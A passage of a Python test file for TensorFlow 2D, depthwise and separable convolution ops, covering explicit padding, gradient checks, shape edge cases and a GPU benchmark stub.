filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 4, 8, 1],
strides=[3, 1],
padding=[[1, 8], [4, 2]],
use_gpu=use_gpu,
data_format=data_format)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_5_0_2_2_BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[1, 7, 7, 1],
strides=[1, 1],
padding=[[5, 0], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 4, 2, 1],
filter_sizes=[3, 3, 1, 1],
output_sizes=[1, 5, 2, 1],
strides=[1, 2],
padding=[[5, 0], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 1])
def ConstructAndTestGradient(self,
batch,
input_rows,
input_cols,
filter_rows,
filter_cols,
in_depth,
out_depth,
stride_rows,
stride_cols,
padding,
test_input,
data_format,
use_gpu,
num_groups=1,
max_err=0.003):
assert in_depth % num_groups == 0 and out_depth % num_groups == 0
input_shape = [batch, input_rows, input_cols, in_depth]
filter_shape = [filter_rows, filter_cols, in_depth // num_groups, out_depth]
if padding == "VALID":
output_rows = (input_rows - filter_rows + stride_rows) // stride_rows
output_cols = (input_cols - filter_cols + stride_cols) // stride_cols
elif padding == "SAME":
output_rows = (input_rows + stride_rows - 1) // stride_rows
output_cols = (input_cols + stride_cols - 1) // stride_cols
else:
self.assertIsInstance(padding, (list, tuple))
output_rows = (input_rows + padding[1][0] + padding[1][1] - filter_rows +
stride_rows) // stride_rows
output_cols = (input_cols + padding[2][0] + padding[2][1] - filter_cols +
stride_cols) // stride_cols
output_shape = [batch, output_rows, output_cols, out_depth]
input_size = 1
for x in input_shape:
input_size *= x
filter_size = 1
for x in filter_shape:
filter_size *= x
input_data = [x * 1.0 / input_size for x in range(0, input_size)]
filter_data = [x * 1.0 / filter_size for x in range(0, filter_size)]
# So we disable the DOUBLE path. We should re-enable this
# when double support returns for CPU and/or GPU.
for dtype in self._DtypesToTest(use_gpu=use_gpu):
with self.cached_session(use_gpu=use_gpu):
input_tensor = constant_op.constant(
input_data, shape=input_shape, dtype=dtype, name="input")
filter_tensor = constant_op.constant(
filter_data, shape=filter_shape, dtype=dtype, name="filter")
strides = [1, stride_rows, stride_cols, 1]
new_padding = padding
if data_format == "NCHW":
new_input_tensor = test_util.NHWCToNCHW(input_tensor)
strides = test_util.NHWCToNCHW(strides)
if isinstance(padding, (list, tuple)):
new_padding = test_util.NHWCToNCHW(padding)
else:
new_input_tensor = input_tensor
conv = nn_ops.conv2d(
new_input_tensor,
filter_tensor,
strides,
new_padding,
data_format=data_format,
name="conv")
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
self.assertEqual(output_shape, conv.get_shape())
if test_input:
jacob_t, jacob_n = gradient_checker.compute_gradient(input_tensor,
input_shape,
conv,
output_shape)
else:
jacob_t, jacob_n = gradient_checker.compute_gradient(filter_tensor,
filter_shape,
conv,
output_shape)
if dtype == dtypes.float32:
reference_jacob_t = jacob_t
err = np.fabs(jacob_t - jacob_n).max()
else:
# Compare fp16 theoretical gradients to fp32 theoretical gradients,
# since fp16 numerical gradients are too imprecise.
err = np.fabs(jacob_t - reference_jacob_t).max()
tf_logging.debug("conv_2d gradient error = %s", err)
self.assertLess(err, max_err)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=4,
out_depth=5,
stride_rows=3,
stride_cols=3,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=3,
stride_cols=3,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=3,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=4,
out_depth=5,
stride_rows=3,
stride_cols=3,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=3,
stride_cols=3,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=1,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientKernelSizeMatchesInputSize(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=3,
filter_rows=4,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientKernelSizeMatchesInputSize(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=3,
filter_rows=4,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient1x1PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.0025)
@test_util.deprecated_graph_mode_only
def testFilterGradient1x1PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient1x1PaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient1x1PaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient2x2PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.003)
@test_util.deprecated_graph_mode_only
def testFilterGradient2x2PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.003)
@test_util.deprecated_graph_mode_only
def testInputGradient1_2_3_4PaddingStride3x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=5,
filter_rows=4,
filter_cols=2,
in_depth=3,
out_depth=2,
stride_rows=3,
stride_cols=2,
padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient1_2_3_4PaddingStride3x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=5,
filter_rows=4,
filter_cols=2,
in_depth=3,
out_depth=2,
stride_rows=3,
stride_cols=2,
padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient4_3_2_1PaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=3,
input_rows=5,
input_cols=7,
filter_rows=3,
filter_cols=2,
in_depth=1,
out_depth=2,
stride_rows=2,
stride_cols=1,
padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient4_3_2_1PaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=3,
input_rows=5,
input_cols=7,
filter_rows=3,
filter_cols=2,
in_depth=1,
out_depth=2,
stride_rows=2,
stride_cols=1,
padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient0_0_0_5PaddingStride1x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=6,
input_cols=7,
filter_rows=3,
filter_cols=4,
in_depth=3,
out_depth=2,
stride_rows=1,
stride_cols=2,
padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient0_0_0_5PaddingStride1x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=6,
input_cols=7,
filter_rows=3,
filter_cols=4,
in_depth=3,
out_depth=2,
stride_rows=1,
stride_cols=2,
padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testShapeFunctionEdgeCases(self):
# All shapes unknown.
c1 = nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding="SAME")
self.assertEqual([None, None, None, None], c1.get_shape().as_list())
# Incorrect input shape.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(
dtypes.float32, shape=[1, 3]),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding="SAME")
# Incorrect filter shape.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(
dtypes.float32, shape=[1, 3]),
strides=[1, 1, 1, 1],
padding="SAME")
# Depth mismatch.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3]),
array_ops.placeholder(
dtypes.float32, shape=[4, 4, 2, 2]),
strides=[1, 1, 1, 1],
padding="SAME")
# Input depth divisible by filter depth (group convolution).
# No exceptions should appear.
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32, shape=[32, 20, 20, 8]),
array_ops.placeholder(dtypes.float32, shape=[4, 4, 2, 16]),
strides=[1, 1, 1, 1],
padding="SAME")
# Negative padding.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0, 0], [0, -1], [1, 2], [0, 0]])
# Nonzero padding in nonspatial dimension.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[1, 0], [0, 0], [0, 0], [0, 0]])
# Nonzero NCHW padding in nonspatial dimension.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0, 0], [0, 1], [0, 0], [0, 0]],
data_format="NCHW")
# Wrong amount of padding
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0, 0], [0, 0], [0, 0]])
# Only specify one padding amount per dimension
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0], [0], [0], [0]])
# Explicit padding elements are not lists
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[0, 0, 0, 0])
@test_util.deprecated_graph_mode_only
def testOpEdgeCases(self):
with self.cached_session() as sess:
# Illegal strides.
with self.assertRaisesRegex(errors_impl.UnimplementedError,
"strides in the batch and depth"):
input_placeholder = array_ops.placeholder(dtypes.float32)
input_val = np.ones([10, 10])
filter_placeholder = array_ops.placeholder(dtypes.float32)
filter_val = np.ones([10, 10])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[2, 1, 1, 1],
padding="SAME"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
with self.assertRaisesRegex(errors_impl.UnimplementedError,
"strides in the batch and depth"):
input_placeholder = array_ops.placeholder(dtypes.float32)
filter_placeholder = array_ops.placeholder(dtypes.float32)
input_val = np.ones([10, 10])
filter_val = np.ones([10, 10])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 2],
padding="SAME"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
# Filter larger than input.
with self.assertRaisesRegex(ValueError, "Negative dimension size"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[20, 21, 3, 2])
filter_val = np.ones([20, 21, 3, 2])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 1],
padding="VALID"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
with self.assertRaisesRegex(ValueError, "Negative dimension size"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[21, 20, 3, 2])
filter_val = np.ones([21, 20, 3, 2])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 1],
padding="VALID"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
# Filter larger than input + padding.
with self.assertRaisesRegex(ValueError, "Negative dimension size"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[24, 25, 3, 2])
filter_val = np.ones([24, 25, 3, 2])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 1],
padding=[[0, 0], [2, 2], [2, 2], [0, 0]]),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
# Negative padding during backprop.
with self.assertRaisesRegex(
errors_impl.InvalidArgumentError,
"All elements of explicit_paddings must be nonnegative"):
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[18, 18, 3, 2])
filter_val = np.ones([18, 18, 3, 2])
out_backprop = array_ops.placeholder(
dtypes.float32, shape=[32, 3, 2, 2])
out_backprop_val = np.ones([32, 3, 2, 2])
sess.run(
nn_ops.conv2d_backprop_input([32, 20, 20, 3],
filter_placeholder,
out_backprop,
strides=[1, 1, 1, 1],
padding=[[0, 0], [-1, 0], [0, 0],
[0, 0]]),
feed_dict={
filter_placeholder: filter_val,
out_backprop: out_backprop_val
})
with self.assertRaisesRegex(
errors_impl.InvalidArgumentError,
"All elements of explicit_paddings must be nonnegative"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
out_backprop = array_ops.placeholder(
dtypes.float32, shape=[32, 3, 2, 2])
out_backprop_val = np.ones([32, 3, 2, 2])
sess.run(
nn_ops.conv2d_backprop_filter(
input_placeholder, [18, 18, 3, 2],
out_backprop,
strides=[1, 1, 1, 1],
padding=[[0, 0], [-1, 0], [0, 0], [0, 0]]),
feed_dict={
input_placeholder: input_val,
out_backprop: out_backprop_val
})
class DepthwiseConv2DTest(test.TestCase):
def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
expected):
total_size_1 = 1
total_size_2 = 1
for s in tensor_in_sizes:
total_size_1 *= s
for s in filter_in_sizes:
total_size_2 *= s
# Initializes the input tensor with array containing incrementing
# numbers from 1.
x1 = [f * 1.0 for f in range(1, total_size_1 + 1)]
x2 = [f * 1.0 for f in range(1, total_size_2 + 1)]
with self.cached_session() as sess:
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t1.set_shape(tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
conv = nn_impl.depthwise_conv2d(
t1, t2, strides=[1, stride, stride, 1], padding=padding)
value = self.evaluate(conv)
tf_logging.debug("value = %s", value)
self.assertArrayNear(expected, np.ravel(value), 1e-5)
self.assertShapeEqual(value, conv)
def testConv2D2x2Filter(self):
# The inputs look like this (it's a 3 x 2 matrix, each of depth 2):
expected_output = [196, 216, 272, 296, 252, 280, 344, 376]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[2, 2, 2, 2],
stride=1,
padding="VALID",
expected=expected_output)
class SeparableConv2DTest(test.TestCase):
def _InitValues(self, sizes):
total_size = 1
for s in sizes:
total_size *= s
x = [f * 0.5 for f in range(1, total_size + 1)]
return constant_op.constant(x, shape=sizes)
def _VerifyValues(self,
tensor_in_sizes,
depthwise_filter_in_sizes,
pointwise_filter_in_sizes,
stride,
padding,
expected,
data_format="NHWC"):
with self.cached_session(use_gpu=True) as sess:
t1 = self._InitValues(tensor_in_sizes)
f1 = self._InitValues(depthwise_filter_in_sizes)
f1.set_shape(depthwise_filter_in_sizes)
f2 = self._InitValues(pointwise_filter_in_sizes)
real_t1 = t1
strides = [1, stride, stride, 1]
if data_format == "NCHW":
real_t1 = array_ops.transpose(t1, [0, 3, 1, 2])
strides = [1, 1, stride, stride]
if isinstance(padding, list):
padding = [padding[0], padding[3], padding[1], padding[2]]
conv = nn_impl.separable_conv2d(
real_t1,
f1,
f2,
strides=strides,
padding=padding,
data_format=data_format)
if data_format == "NCHW":
conv = array_ops.transpose(conv, [0, 2, 3, 1])
value = self.evaluate(conv)
tf_logging.debug("value = %s", value)
self.assertArrayNear(expected, np.ravel(value), 2e-3)
self.assertShapeEqual(value, conv)
def _testSeparableConv2D(self, data_format):
expected_output = [
6644.5, 6971.5, 7298.5, 7625.5, 7952.5, 8279.5, 8606.5, 8154.5, 8556.5,
8958.5, 9360.5, 9762.5, 10164.5, 10566.5, 9664.5, 10141.5, 10618.5,
11095.5, 11572.5, 12049.5, 12526.5, 4145.5, 4346.5, 4547.5, 4748.5,
4949.5, 5150.5, 5351.5, 12684.5, 13311.5, 13938.5, 14565.5, 15192.5,
15819.5, 16446.5, 14194.5, 14896.5, 15598.5, 16300.5, 17002.5, 17704.5,
18406.5, 15704.5, 16481.5, 17258.5, 18035.5, 18812.5, 19589.5, 20366.5,
6499.5, 6814.5, 7129.5, 7444.5, 7759.5, 8074.5, 8389.5, 18724.5,
19651.5, 20578.5, 21505.5, 22432.5, 23359.5, 24286.5, 20234.5, 21236.5,
22238.5, 23240.5, 24242.5, 25244.5, 26246.5, 21744.5, 22821.5, 23898.5,
24975.5, 26052.5, 27129.5, 28206.5, 8853.5, 9282.5, 9711.5, 10140.5,
10569.5, 10998.5, 11427.5, 5746.75, 6010.75, 6274.75, 6538.75, 6802.75,
7066.75, 7330.75, 6168.75, 6452.25, 6735.75, 7019.25, 7302.75, 7586.25,
7869.75, 6590.75, 6893.75, 7196.75, 7499.75, 7802.75, 8105.75, 8408.75,
2036.25, 2119.5, 2202.75, 2286.0, 2369.25, 2452.5, 2535.75
]
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 2],
depthwise_filter_in_sizes=[2, 2, 2, 3],
pointwise_filter_in_sizes=[1, 1, 6, 7],
stride=1,
padding="SAME",
expected=expected_output,
data_format=data_format)
def testSeparableConv2D(self):
self._testSeparableConv2D("NHWC")
def disabledtestSeparableConv2DNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2D("NCHW")
def _testSeparableConv2DEqualInputOutputDepth(self, data_format):
expected_output = [
5742.0, 6069.0, 6396.0, 6723.0, 7050.0, 7377.0, 7047.0, 7449.0, 7851.0,
8253.0, 8655.0, 9057.0, 8352.0, 8829.0, 9306.0, 9783.0, 10260.0,
10737.0, 3582.0, 3783.0, 3984.0, 4185.0, 4386.0, 4587.0, 10962.0,
11589.0, 12216.0, 12843.0, 13470.0, 14097.0, 12267.0, 12969.0, 13671.0,
14373.0, 15075.0, 15777.0, 13572.0, 14349.0, 15126.0, 15903.0, 16680.0,
17457.0, 5616.0, 5931.0, 6246.0, 6561.0, 6876.0, 7191.0, 16182.0,
17109.0, 18036.0, 18963.0, 19890.0, 20817.0, 17487.0, 18489.0, 19491.0,
20493.0, 21495.0, 22497.0, 18792.0, 19869.0, 20946.0, 22023.0, 23100.0,
24177.0, 7650.0, 8079.0, 8508.0, 8937.0, 9366.0, 9795.0, 4963.5, 5227.5,
5491.5, 5755.5, 6019.5, 6283.5, 5328.0, 5611.5, 5895.0, 6178.5, 6462.0,
6745.5, 5692.5, 5995.5, 6298.5, 6601.5, 6904.5, 7207.5, 1757.25, 1840.5,
1923.75, 2007.0, 2090.25, 2173.5
]
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 2],
depthwise_filter_in_sizes=[2, 2, 2, 3],
pointwise_filter_in_sizes=[1, 1, 6, 6],
stride=1,
padding="SAME",
expected=expected_output,
data_format=data_format)
@test_util.deprecated_graph_mode_only
def testSeparableConv2DEqualInputOutputDepth(self):
self._testSeparableConv2DEqualInputOutputDepth("NHWC")
def testSeparableConv2DEqualInputOutputDepthNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2DEqualInputOutputDepth("NCHW")
def _testSeparableConv2dExplicitPadding(self, data_format):
tensor_in_sizes = [1, 4, 4, 2]
depthwise_filter_in_sizes = [2, 2, 2, 3]
pointwise_filter_in_sizes = [1, 1, 6, 7]
padding = [[0, 0], [1, 2], [3, 4], [0, 0]]
with self.cached_session(use_gpu=True):
t1 = self._InitValues(tensor_in_sizes)
t1 = array_ops.pad(t1, padding)
f1 = self._InitValues(depthwise_filter_in_sizes)
f1.set_shape(depthwise_filter_in_sizes)
f2 = self._InitValues(pointwise_filter_in_sizes)
conv = nn_impl.separable_conv2d(
t1,
f1,
f2,
strides=[1, 1, 1, 1],
padding="VALID",
data_format="NHWC")
expected = self.evaluate(conv)
expected = np.ravel(expected)
self._VerifyValues(
tensor_in_sizes=tensor_in_sizes,
depthwise_filter_in_sizes=depthwise_filter_in_sizes,
pointwise_filter_in_sizes=pointwise_filter_in_sizes,
stride=1,
padding=padding,
expected=expected,
data_format=data_format)
def testSeparableConv2dExplicitPadding(self):
self._testSeparableConv2dExplicitPadding("NHWC")
def testSeparableConv2dExplicitPaddingNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2dExplicitPadding("NCHW")
class DeepConv2DTest(test.TestCase):
def _CompareFwdConv2D(self, tensor_in_sizes, filter_in_sizes, conv_strides,
padding):
x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
x2 = np.random.rand(*filter_in_sizes).astype(np.float32)
with self.cached_session(use_gpu=False) as sess:
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
strides = [1] + conv_strides + [1]
conv = nn_ops.conv2d(t1, t2, strides=strides, padding=padding)
os.environ["TF_USE_DEEP_CONV2D"] = "0"
values_expect = self.evaluate([conv])
os.environ["TF_USE_DEEP_CONV2D"] = "1"
values_test = self.evaluate([conv])
self.assertAllClose(values_expect, values_test, rtol=1e-5, atol=1e-5)
def _RunTestCases(self, conv_strides, padding):
input_sizes = [[5, 5, 5, 1248], [3, 17, 17, 192], [2, 35, 35, 288],
[2, 6, 8, 517], [2, 7, 4, 81], [3, 11, 3, 77]]
filter_sizes = [[3, 3, 1248, 128], [3, 3, 192, 192], [3, 3, 288, 384],
[3, 3, 517, 64], [3, 3, 81, 77], [3, 3, 77, 181]]
for input_shape, filter_shape in zip(input_sizes, filter_sizes):
self._CompareFwdConv2D(input_shape, filter_shape, conv_strides, padding)
def testConv2D3x3FilterStride1x1Valid(self):
self._RunTestCases([1, 1], "VALID")
def testConv2D3x3FilterStride1x1Same(self):
self._RunTestCases([1, 1], "SAME")
class Conv2DBenchmark(test.Benchmark):
def benchmarkGPUConvStackFirst(self):
if not test.is_gpu_available():
return
with ops.Graph().as_default(), session_lib.Session() as session:
batch_size = 1
timesteps = 600
features = 1
inputs = random_ops.random_uniform(
[batch_size, 1, timesteps, features], seed=1234)
num_outputs_list = [512] * 40 + [1]
kernel_w = 3
x = inputs
for num_outputs in num_outputs_list:
